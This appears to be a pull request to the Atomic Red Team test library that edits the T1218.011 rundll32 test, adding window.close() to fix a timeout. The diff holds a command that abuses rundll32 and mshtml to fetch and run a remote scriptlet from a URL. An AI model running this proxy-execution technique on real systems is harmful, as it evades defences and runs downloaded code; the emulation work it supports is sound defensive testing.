### PR TITLE
T1218.011

### DIFF
--- a/atomics/T1218.011/T1218.011.yaml
+++ b/atomics/T1218.011/T1218.011.yaml
@@ -14,7 +14,7 @@ atomic_tests:
       default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
   executor:
     command: |
-      start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
     cleanup_command: |
       taskkill /IM notepad.exe /f
     name: command_prompt


### PR DESCRIPTION
**Details:**
<!-- Insert details about this change here. Please include as much detail as possible -->
Added  'window.close();' to the command and removed 'start /b'. This atomic was still timing out after the last update. 'window.close()' should now close out of the javascript  HTML application which seems to be what is causing the timeout

**Testing:**
<!-- Note any testing done, local or automated here. -->
windows 10

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->